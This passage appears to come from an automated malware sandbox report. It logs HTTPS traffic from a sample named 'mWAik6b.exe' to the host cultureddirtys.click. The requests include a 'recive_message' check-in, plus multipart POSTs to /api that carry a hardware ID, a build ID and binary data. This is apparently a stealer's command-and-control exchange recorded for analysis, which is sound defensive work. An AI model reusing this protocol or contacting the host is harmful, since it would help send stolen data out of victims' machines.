                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 54
                        Host: cultureddirtys.click
                        2025-01-14 15:15:11 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 26 6a 3d
                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--zdqcssmdpvku&j=
                        2025-01-14 15:15:11 UTC1133INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=m8inars0197p0nepnsum1ab737; expires=Sat, 10 May 2025 09:01:50 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xmz9gvtHq8sPZgpjSaMOLZLzywLWbNr2GIJCDkIwQXUHmiswnO3kY4VAaG798uHPwtPmUbRsPMOOHO43%2BPoEILR00%2BeoPjVF%2BJkjS7Jv2rwZYU7eT9fSOqypFr4I8js7QbHOECCeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e947aed994314-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1588&rtt_var=619&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2854&recv_bytes=958&delivery_rate=1733966&cwnd=188&unsent_bytes=0&cid=ce9d21a401546a49&ts=484&x=0"
                        2025-01-14 15:15:11 UTC236INData Raw: 34 37 32 0d 0a 4b 44 42 43 52 37 59 58 6d 71 33 54 4c 56 76 6b 4a 61 6d 78 51 7a 4a 67 37 6c 67 65 70 34 78 7a 47 68 64 58 49 39 79 35 47 6b 4e 54 45 6a 52 6c 6a 43 4f 32 6a 36 42 49 65 64 35 52 32 38 51 6d 48 6b 4b 50 50 44 79 64 36 68 4a 32 5a 44 49 50 2f 73 39 33 59 52 4a 57 49 79 76 46 63 72 61 50 74 6c 56 35 33 6e 37 53 6b 79 5a 63 51 74 52 36 65 38 33 75 45 6e 5a 31 4e 6b 69 7a 79 58 59 67 51 46 77 6c 4c 39 4e 30 2f 73 79 2f 51 44 36 42 51 4d 6a 62 4c 56 73 4e 68 6a 55 38 69 36 34 57 59 44 56 74 41 5a 48 63 62 69 4a 6c 55 54 45 73 6c 47 71 32 31 76 46 49 4e 63 59 66 69 39 41 6d 55 41 79 49 50 48 58 50 35 42 74 2b 64 44 4e 4a 72 4e 42 38 4b 30 42 53 4a 69 37 5a 66 65 72 42 74 55 63 31 68 30 72
                        Data Ascii: 472KDBCR7YXmq3TLVvkJamxQzJg7lgep4xzGhdXI9y5GkNTEjRljCO2j6BIed5R28QmHkKPPDyd6hJ2ZDIP/s93YRJWIyvFcraPtlV53n7SkyZcQtR6e83uEnZ1NkizyXYgQFwlL9N0/sy/QD6BQMjbLVsNhjU8i64WYDVtAZHcbiJlUTEslGq21vFINcYfi9AmUAyIPHXP5Bt+dDNJrNB8K0BSJi7ZferBtUc1h0r
                        2025-01-14 15:15:11 UTC909INData Raw: 49 6b 32 38 51 42 5a 52 36 4a 49 57 39 49 33 74 6b 4a 46 53 7a 79 33 35 68 56 52 77 35 5a 64 4e 35 75 4a 66 78 52 7a 57 49 51 73 6a 63 4a 6c 45 43 6e 6a 56 38 78 75 59 5a 66 48 38 36 54 72 48 56 63 69 5a 43 57 79 63 71 30 33 33 2b 77 4c 49 50 64 38 5a 41 30 35 4e 35 45 43 4b 63 4f 58 2f 52 34 77 41 34 61 6e 74 59 2f 74 78 30 59 52 49 53 4a 69 76 56 65 50 6a 64 75 55 51 79 67 31 58 41 32 69 78 64 41 6f 45 77 63 38 62 75 46 6e 4a 2f 4f 6b 75 36 31 6e 55 6e 53 6c 4a 67 61 35 52 79 34 49 2f 70 44 78 71 44 56 38 7a 66 4e 78 49 34 7a 43 55 79 33 4b 34 57 64 44 56 74 41 62 62 65 65 79 4a 42 58 53 4d 74 33 32 66 34 33 62 64 43 50 4a 52 42 7a 74 30 72 55 78 43 47 4e 48 72 47 35 78 70 78 63 44 4a 46 2f 70 55 34 4a 6c 49 53 65 47 58 31 65 50 50 44 75 31 67 35 78 6c
                        Data Ascii: Ik28QBZR6JIW9I3tkJFSzy35hVRw5ZdN5uJfxRzWIQsjcJlECnjV8xuYZfH86TrHVciZCWycq033+wLIPd8ZA05N5ECKcOX/R4wA4antY/tx0YRISJivVePjduUQyg1XA2ixdAoEwc8buFnJ/Oku61nUnSlJga5Ry4I/pDxqDV8zfNxI4zCUy3K4WdDVtAbbeeyJBXSMt32f43bdCPJRBzt0rUxCGNHrG5xpxcDJF/pU4JlISeGX1ePPDu1g5xl
                        2025-01-14 15:15:11 UTC1369INData Raw: 34 35 32 32 0d 0a 71 67 43 44 68 79 4f 51 48 6d 6d 33 63 75 52 56 6f 67 4a 4e 42 34 2f 4d 36 38 51 7a 43 46 53 38 66 62 4c 46 77 47 67 7a 4a 30 78 75 59 44 64 6e 73 7a 52 37 37 65 4f 47 38 4b 56 54 68 6c 6a 44 58 63 77 61 5a 62 4d 73 52 79 79 4e 30 76 56 78 54 4d 4a 54 4c 63 72 68 5a 30 4e 57 30 42 73 4e 5a 7a 4c 55 31 62 49 53 62 55 66 2f 62 41 75 30 63 78 68 6b 72 4b 32 43 6c 57 44 34 63 31 63 38 4c 6d 45 6e 52 77 4f 45 4c 2b 6c 54 67 6d 55 68 4a 34 5a 66 46 37 2b 39 36 67 44 51 79 46 53 63 58 55 4e 78 41 64 77 69 4d 38 77 75 4a 52 49 44 55 2f 52 72 6e 66 64 53 74 4a 56 69 51 6f 32 33 7a 78 78 71 4e 46 4e 59 68 56 78 74 6b 6b 58 67 36 4a 4e 58 7a 45 37 78 39 79 66 6e 55 50 2f 74 78 67 59 52 49 53 44 79 6a 45 5a 2f 4c 45 6f 41 30 4d 68 55 6e 46 31 44 63
                        Data Ascii: 4522qgCDhyOQHmm3cuRVogJNB4/M68QzCFS8fbLFwGgzJ0xuYDdnszR77eOG8KVThljDXcwaZbMsRyyN0vVxTMJTLcrhZ0NW0BsNZzLU1bISbUf/bAu0cxhkrK2ClWD4c1c8LmEnRwOEL+lTgmUhJ4ZfF7+96gDQyFScXUNxAdwiM8wuJRIDU/RrnfdStJViQo23zxxqNFNYhVxtkkXg6JNXzE7x9yfnUP/txgYRISDyjEZ/LEoA0MhUnF1Dc
                        2025-01-14 15:15:11 UTC1369INData Raw: 48 61 46 38 56 39 68 4e 54 4a 4e 2f 6f 4d 34 4b 30 5a 57 49 79 6e 64 65 66 58 4f 74 55 67 30 67 6b 66 4e 31 53 52 52 43 59 51 32 63 38 2f 69 46 58 52 38 4d 30 32 39 32 48 35 68 42 42 49 6e 50 5a 51 74 75 4f 36 38 52 44 57 47 52 4e 72 55 59 52 35 43 67 6a 78 38 68 62 59 48 61 47 49 79 58 76 44 43 4f 43 5a 47 45 6e 68 6c 33 6d 66 39 77 62 56 46 50 49 4a 4c 77 64 4d 6b 51 67 71 4b 50 58 44 4e 36 78 35 2b 63 44 68 47 74 64 68 71 4d 30 6c 57 4c 69 6d 55 4f 37 6a 49 71 51 39 68 78 6d 4c 63 30 44 46 57 41 63 77 6c 4d 74 79 75 46 6e 51 31 62 51 47 2b 31 58 51 71 54 56 6b 72 49 64 42 31 39 63 53 2f 51 54 43 4b 54 38 66 55 4d 31 30 48 68 44 42 31 77 4f 49 63 65 32 63 32 51 50 36 56 4f 43 5a 53 45 6e 68 6c 38 30 62 50 37 50 46 51 64 35 38 48 7a 4e 39 68 43 45 4b 4e
                        Data Ascii: HaF8V9hNTJN/oM4K0ZWIyndefXOtUg0gkfN1SRRCYQ2c8/iFXR8M0292H5hBBInPZQtuO68RDWGRNrUYR5Cgjx8hbYHaGIyXvDCOCZGEnhl3mf9wbVFPIJLwdMkQgqKPXDN6x5+cDhGtdhqM0lWLimUO7jIqQ9hxmLc0DFWAcwlMtyuFnQ1bQG+1XQqTVkrIdB19cS/QTCKT8fUM10HhDB1wOIce2c2QP6VOCZSEnhl80bP7PFQd58HzN9hCEKN
                        2025-01-14 15:15:11 UTC1369INData Raw: 34 4f 4e 6d 78 31 52 72 4b 62 49 47 46 4e 57 69 67 72 31 33 50 7a 77 37 31 4f 4d 49 42 43 77 39 51 75 56 77 75 4c 4f 6e 72 58 36 52 78 78 64 54 35 49 74 4e 39 35 4b 67 6f 63 59 43 4c 4d 4e 61 43 50 67 30 67 76 6c 6b 53 4c 7a 47 39 4a 51 6f 73 32 50 4a 32 75 48 47 70 30 4d 46 4f 36 31 48 4d 7a 51 56 51 67 49 4d 5a 79 39 4d 57 2b 54 44 47 4c 52 4d 50 42 49 56 30 43 6e 69 68 36 7a 75 42 52 4e 6a 55 79 57 66 36 44 4f 42 42 64 57 57 41 36 6d 6d 79 34 79 4c 30 50 59 63 5a 45 77 64 34 76 51 67 61 4b 4d 58 2f 4c 35 68 52 77 63 54 39 4d 73 64 42 79 4b 45 4a 53 4c 79 44 63 66 76 37 42 73 45 6b 31 69 77 65 46 6b 79 5a 49 51 74 52 36 57 39 2f 6a 46 32 39 6b 41 45 61 2b 69 6a 67 2b 42 45 74 67 49 74 67 31 6f 49 2b 38 51 7a 4f 4c 51 73 2f 62 4a 6c 4d 44 67 44 35 78 79
                        Data Ascii: 4ONmx1RrKbIGFNWigr13Pzw71OMIBCw9QuVwuLOnrX6RxxdT5ItN95KgocYCLMNaCPg0gvlkSLzG9JQos2PJ2uHGp0MFO61HMzQVQgIMZy9MW+TDGLRMPBIV0Cnih6zuBRNjUyWf6DOBBdWWA6mmy4yL0PYcZEwd4vQgaKMX/L5hRwcT9MsdByKEJSLyDcfv7BsEk1iweFkyZIQtR6W9/jF29kAEa+ijg+BEtgItg1oI+8QzOLQs/bJlMDgD5xy
                        2025-01-14 15:15:11 UTC1369INData Raw: 31 4f 30 79 34 32 6e 6b 70 51 6c 49 6d 4c 39 42 32 38 63 79 32 52 6a 2b 4e 52 4d 48 63 4a 6c 59 47 6a 44 46 37 79 2b 67 55 63 33 78 31 44 2f 37 63 59 47 45 53 45 67 59 47 78 6d 66 4b 77 62 4a 55 65 5a 6b 4a 30 70 4d 6d 58 45 4c 55 65 6e 66 4e 34 51 4e 39 66 44 31 46 74 39 74 38 4b 30 64 56 49 43 44 5a 63 50 7a 42 74 55 67 35 69 6b 6a 4d 32 79 35 55 41 6f 4e 36 4d 6f 58 70 43 54 67 74 64 57 47 31 7a 56 6b 76 51 55 42 67 4f 70 70 73 75 4d 69 39 44 32 48 47 53 63 4c 53 4b 56 34 4f 68 44 35 75 78 65 55 59 64 33 51 36 51 62 33 61 63 69 6c 59 56 43 41 75 33 48 4c 77 79 37 39 64 4f 49 6b 48 68 5a 4d 6d 53 45 4c 55 65 6b 33 54 36 52 5a 33 4e 78 78 47 70 64 70 79 49 6b 46 65 59 44 71 61 62 4c 6a 49 76 51 39 68 78 6b 72 48 33 69 56 43 44 6f 77 36 64 63 4c 6b 41 33
                        Data Ascii: 1O0y42nkpQlImL9B28cy2Rj+NRMHcJlYGjDF7y+gUc3x1D/7cYGESEgYGxmfKwbJUeZkJ0pMmXELUenfN4QN9fD1Ft9t8K0dVICDZcPzBtUg5ikjM2y5UAoN6MoXpCTgtdWG1zVkvQUBgOppsuMi9D2HGScLSKV4OhD5uxeUYd3Q6Qb3acilYVCAu3HLwy79dOIkHhZMmSELUek3T6RZ3NxxGpdpyIkFeYDqabLjIvQ9hxkrH3iVCDow6dcLkA3
                        2025-01-14 15:15:11 UTC1369INData Raw: 73 74 46 2f 4c 31 68 54 4b 69 6e 56 63 76 2f 45 6f 30 51 72 6a 55 2f 49 33 53 6c 5a 41 6f 49 36 66 63 6a 75 55 54 59 31 4d 6c 6e 2b 67 7a 67 45 61 55 55 32 4c 35 5a 57 37 39 6d 37 53 44 57 51 54 4d 72 51 4e 31 30 53 7a 48 51 38 31 4f 6b 41 4f 43 30 6a 55 61 6e 63 5a 32 39 54 45 69 63 70 6c 43 32 34 78 4c 35 42 4e 49 31 44 77 74 59 70 55 77 65 4a 4d 48 44 4a 37 78 6c 78 66 7a 42 45 75 4e 46 37 4c 30 56 54 4c 43 48 64 65 2f 47 50 2f 77 38 2b 6e 67 65 54 6b 78 64 41 42 5a 51 33 62 49 66 63 45 6d 6c 6b 49 45 79 75 33 54 6f 4f 53 56 34 6a 49 4e 4e 6c 75 4e 44 2f 56 6e 6d 42 53 34 75 4c 59 56 41 47 67 44 6c 37 79 2b 45 63 64 33 49 2b 54 72 54 56 61 69 35 50 57 69 77 74 32 57 66 79 78 61 4e 47 4d 49 74 4a 77 38 45 69 45 45 7a 4d 50 57 53 46 74 6c 46 4b 66 7a 5a
                        Data Ascii: stF/L1hTKinVcv/Eo0QrjU/I3SlZAoI6fcjuUTY1Mln+gzgEaUU2L5ZW79m7SDWQTMrQN10SzHQ81OkAOC0jUancZ29TEicplC24xL5BNI1DwtYpUweJMHDJ7xlxfzBEuNF7L0VTLCHde/GP/w8+ngeTkxdABZQ3bIfcEmlkIEyu3ToOSV4jINNluND/VnmBS4uLYVAGgDl7y+Ecd3I+TrTVai5PWiwt2WfyxaNGMItJw8EiEEzMPWSFtlFKfzZ
                        2025-01-14 15:15:11 UTC1369INData Raw: 44 6b 4b 43 6d 41 51 31 33 76 32 79 4b 64 65 64 4b 64 4b 77 4e 38 73 58 77 6e 4d 64 44 7a 44 72 6b 6b 6f 4f 33 56 46 72 35 73 67 63 52 67 4a 64 58 61 44 4a 61 72 51 2f 31 5a 35 6b 41 65 54 67 57 38 51 45 4d 78 69 50 49 4c 74 41 32 70 7a 4e 6c 65 39 6e 45 59 66 61 55 55 32 4c 38 38 33 33 73 69 67 52 69 2b 4c 56 66 58 74 44 31 30 44 6a 7a 51 2b 39 50 67 63 61 48 59 77 52 6f 44 6c 64 69 5a 65 56 53 34 6a 31 44 57 32 6a 37 34 50 59 62 38 48 67 35 4d 65 48 6b 4b 55 65 69 53 46 32 78 4a 32 65 7a 4a 58 72 35 5a 62 4e 6c 78 59 4f 32 66 79 63 75 6e 47 70 30 49 72 78 67 6d 4c 31 57 45 49 55 73 4a 36 65 4e 53 75 53 53 67 6e 62 68 54 74 6a 43 68 7a 56 52 77 35 5a 63 49 31 6f 4a 33 2f 44 79 76 47 48 34 75 55 49 6b 49 51 69 6a 6c 71 78 71 6b 76 52 6c 55 2b 56 37 2f 57
                        Data Ascii: DkKCmAQ13v2yKdedKdKwN8sXwnMdDzDrkkoO3VFr5sgcRgJdXaDJarQ/1Z5kAeTgW8QEMxiPILtA2pzNle9nEYfaUU2L8833sigRi+LVfXtD10DjzQ+9PgcaHYwRoDldiZeVS4j1DW2j74PYb8Hg5MeHkKUeiSF2xJ2ezJXr5ZbNlxYO2fycunGp0IrxgmL1WEIUsJ6eNSuSSgnbhTtjChzVRw5ZcI1oJ3/DyvGH4uUIkIQijlqxqkvRlU+V7/W
                        2025-01-14 15:15:11 UTC1369INData Raw: 64 7a 63 6f 51 6e 35 34 47 6f 44 79 2f 47 48 35 6d 64 59 55 4a 43 31 48 6f 37 78 76 77 44 66 6e 59 6a 51 76 6e 6c 52 68 52 4a 58 43 34 69 77 6b 44 37 33 72 4a 50 4d 72 68 35 36 74 30 71 56 77 36 61 42 45 4c 77 37 52 39 32 63 69 4e 51 2f 70 55 34 4c 67 6f 4b 47 57 57 63 4e 63 65 42 38 56 64 35 33 67 66 2b 30 43 39 65 42 5a 6f 72 4d 66 44 74 41 48 74 31 50 67 48 77 6d 33 35 68 45 67 42 75 5a 64 42 6b 75 4a 66 68 48 57 4c 54 46 4a 79 44 63 30 39 4d 6c 58 70 71 68 62 5a 44 4e 6a 55 6e 41 65 61 62 50 79 4a 59 51 43 59 6d 77 6e 61 2f 38 59 39 70 4f 6f 46 42 79 4e 30 32 51 55 43 6a 4f 58 66 4a 34 68 5a 75 53 77 74 55 76 64 56 32 4a 6c 78 44 59 47 75 55 65 72 69 58 69 41 38 6f 6a 45 43 48 6d 32 31 42 45 59 49 78 61 73 4b 75 4c 6a 59 31 4c 51 48 6d 6d 30 30 69 52
                        Data Ascii: dzcoQn54GoDy/GH5mdYUJC1Ho7xvwDfnYjQvnlRhRJXC4iwkD73rJPMrh56t0qVw6aBELw7R92ciNQ/pU4LgoKGWWcNceB8Vd53gf+0C9eBZorMfDtAHt1PgHwm35hEgBuZdBkuJfhHWLTFJyDc09MlXpqhbZDNjUnAeabPyJYQCYmwna/8Y9pOoFByN02QUCjOXfJ4hZuSwtUvdV2JlxDYGuUeriXiA8ojECHm21BEYIxasKuLjY1LQHmm00iR


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549708172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:12 UTC281OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=YM6I1A3CSQRET
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 12812
                        Host: cultureddirtys.click
                        2025-01-14 15:15:12 UTC12812OUTData Raw: 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 59 4d 36 49
                        Data Ascii: --YM6I1A3CSQRETContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--YM6I1A3CSQRETContent-Disposition: form-data; name="pid"2--YM6I1A3CSQRETContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--YM6I
                        2025-01-14 15:15:13 UTC1134INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=1tf31je1863eb36r9f7f3orb7q; expires=Sat, 10 May 2025 09:01:51 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uExcjJYf8zActJ3KSy%2BS1eFlsjgGtk4nXJ4hx3R564NNiCToV9ZiJgULe9PB66k1FZ8AfhefS1VWIlspQInq2dCsVnHKY5B4zaUOzx0VY2eNqPgSSsxKt26ZRqnMF9fej%2F5glF1qmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e94830ecc5e74-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1651&rtt_var=626&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2853&recv_bytes=13751&delivery_rate=1768625&cwnd=112&unsent_bytes=0&cid=4988f5b4dbb00824&ts=921&x=0"
                        2025-01-14 15:15:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                        Data Ascii: fok 8.46.123.189
                        2025-01-14 15:15:13 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549713172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:13 UTC280OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=GBQG17QEBFSF
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 15048
                        Host: cultureddirtys.click
                        2025-01-14 15:15:13 UTC15048OUTData Raw: 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 47 42 51 47 31 37 51
                        Data Ascii: --GBQG17QEBFSFContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--GBQG17QEBFSFContent-Disposition: form-data; name="pid"2--GBQG17QEBFSFContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--GBQG17Q
                        2025-01-14 15:15:14 UTC1130INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=bk2jbh0ltdt1ck8i71duoqi62f; expires=Sat, 10 May 2025 09:01:53 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNr5hMgrAoOnREsV5UgVHiIMZt3bPFJCbApH6Hlj6oKvtKvLuVIXWrLxFKk17vuuQtiwsCE2UABrjTroXWAUbZKrK57ub7BObSIiqfYX7w8kLhy7NMSzAfpqFkOzBdXkLu7J9wErqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e948bee6305a2-IAD
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=7841&min_rtt=7834&rtt_var=2951&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2854&recv_bytes=15986&delivery_rate=370088&cwnd=32&unsent_bytes=0&cid=a0451137db16dae6&ts=621&x=0"
                        2025-01-14 15:15:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                        Data Ascii: fok 8.46.123.189
                        2025-01-14 15:15:14 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.549715172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:15 UTC279OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=LIGXB76K4YW
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 20532
                        Host: cultureddirtys.click
                        2025-01-14 15:15:15 UTC15331OUTData Raw: 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59
                        Data Ascii: --LIGXB76K4YWContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--LIGXB76K4YWContent-Disposition: form-data; name="pid"3--LIGXB76K4YWContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--LIGXB76K4Y
                        2025-01-14 15:15:15 UTC5201OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: un 4F([:7s~X`nO`i
                        2025-01-14 15:15:15 UTC1135INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=614ib24qrc24vngcseu0jssqlk; expires=Sat, 10 May 2025 09:01:54 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tW3CVQwFPaDrzbkjVo4NHVy1oQwFLcEQNmewDC0zNvhFzdpF8g0CbGn%2F8qrDo0KgW0rhDdNImS2icGbxIdKADZA0dj0YOd01GdIuFNSikF19jl3cbmkyGmMqDcF6gPVwN%2FAep2daTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e9494bf5243cb-EWR
                        alt-svc: h3=":443"; ma=86400
